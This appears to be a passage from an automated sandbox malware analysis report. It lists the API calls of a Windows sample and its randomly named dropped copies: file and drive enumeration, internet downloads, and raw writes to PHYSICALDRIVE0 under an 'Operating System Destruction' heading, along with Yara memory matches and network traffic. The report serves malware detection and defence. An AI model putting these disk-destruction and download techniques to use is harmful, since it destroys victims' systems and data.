            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 12_2_0041F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 12_2_0041F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 13_2_001BF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 13_2_001BF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 14_2_0035F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 14_2_0035F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 15_2_0031F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 15_2_0031F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 16_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 16_2_0038F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 17_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 17_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 18_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 18_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 19_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 19_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 20_2_0032F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 20_2_0032F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 21_2_0051F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 21_2_0051F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 22_2_0019F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 22_2_0019F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 23_2_0084F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 23_2_0084F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 25_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 25_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 26_2_0082F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 26_2_0082F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 27_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 27_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 29_2_005DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 29_2_005DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 30_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 30_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 31_2_0091F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 31_2_0091F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 32_2_0039F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 32_2_0039F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 33_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 33_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 34_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 34_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 35_2_0015F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 35_2_0015F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 36_2_007FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 36_2_007FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 37_2_0025F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 37_2_0025F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 38_2_0026F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 38_2_0026F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 39_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 39_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 40_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 40_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 41_2_0028F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 41_2_0028F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 42_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 42_2_0010F130
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0036F9E0 memset,GetLogicalDriveStringsA,lstrcatA,lstrcatA, | 4_2_0036F9E0
            Source: Joe Sandbox View | IP Address: 151.101.2.137 151.101.2.137
            Source: Joe Sandbox View | IP Address: 151.101.2.137 151.101.2.137
            Source: Joe Sandbox View | IP Address: 18.244.18.38 18.244.18.38
            Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0036AA10 memset,lstrcpyA,InternetOpenA,lstrlenA,InternetOpenUrlA,HttpQueryInfoA,InternetQueryDataAvailable,InternetReadFile,??2@YAPAXI@Z,InternetReadFile,??2@YAPAXI@Z,??3@YAXPAX@Z,InternetCloseHandle, | 4_2_0036AA10
            Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[1].ico
            Source: global traffic | HTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://www.msn.com/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: code.jquery.com DNT: 1 Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /b?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.msn.com/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: sb.scorecardresearch.com DNT: 1 Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.msn.com/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: sb.scorecardresearch.com DNT: 1 Connection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: www.msn.com
            Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
            Source: global traffic | DNS traffic detected: DNS query: c.msn.com
            Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
            Source: global traffic | DNS traffic detected: DNS query: code.jquery.com
            Source: global traffic | DNS traffic detected: DNS query: browser.events.data.msn.com
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://api.wipmania.com/
            Source: imagestore.dat.24.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: YJ1BHFNR.htm.24.dr | String found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js
            Source: YJ1BHFNR.htm.24.dr | String found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js
            Source: YJ1BHFNR.htm.24.dr | String found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js
            Source: YJ1BHFNR.htm.24.dr | String found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js
            Source: {E68EA6F6-C74D-11EF-8F38-ECF4BBB5915B}.dat.6.dr, ~DF854EA4F5FD60E78B.TMP.6.dr | String found in binary or memory: https://www.msn.com/?ocid=iehp
            Source: imagestore.dat.24.dr | String found in binary or memory: https://www.msn.com/favicon.ico
            Source: experience.b374b0d5b40196862f17[1].js.24.dr | String found in binary or memory: https://www.msn.com/fr-ch/actualite/other/Mentions-l
            Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49181 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49181
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180
            Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknown | HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49181 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49180 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49175 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49174 version: TLS 1.2

            Operating System Destruction

            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00369D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 4_2_00369D90
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00409D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 4_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 9_2_003D9D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 9_2_003D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 10_2_00189D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 10_2_00189D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 11_2_00389D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 11_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 12_2_00419D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 12_2_00419D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 13_2_001B9D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 13_2_001B9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 14_2_00359D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 14_2_00359D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 15_2_00319D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 15_2_00319D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 16_2_00389D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 16_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 17_2_00109D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 17_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 18_2_00109D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 18_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 19_2_00229D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 19_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 20_2_00329D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 20_2_00329D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 21_2_00519D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 21_2_00519D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 22_2_00199D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 22_2_00199D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 23_2_00849D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 23_2_00849D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 25_2_00409D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 25_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 26_2_00829D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 26_2_00829D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 27_2_00099D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 27_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 29_2_005D9D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 29_2_005D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 30_2_00099D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 30_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 31_2_00919D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 31_2_00919D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 32_2_00399D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 32_2_00399D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 33_2_00099D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 33_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 34_2_00229D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 34_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 35_2_00159D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 35_2_00159D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 36_2_007F9D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 36_2_007F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 37_2_00259D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 37_2_00259D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 38_2_00269D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 38_2_00269D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 39_2_003F9D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 39_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 40_2_003F9D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 40_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 41_2_00289D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 41_2_00289D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 42_2_00109D90 CreateFileA on filename \\.\PHYSICALDRIVE0 | 42_2_00109D90
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Start Page Redirect Cache

            System Summary

            Source: Yara match | File source: Process Memory Space: 25F.tmp.exe PID: 3356, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: 25F.tmp.exe PID: 3380, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: WmiPrvSE.exe PID: 652, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2384, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1440, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2096, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1804, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 892, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1968, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 172, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 492, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1784, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1396, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 816, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1012, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1668, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2836, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1756, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2672, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2708, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2704, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2868, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 3068, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2684, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2688, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1436, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1452, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1060, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2248, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1448, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 2228, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1260, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 1852, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 724, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: QgGhoOpxHPl.exe PID: 772, type: MEMORYSTR
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory allocated: 770B0000 page execute and read and write
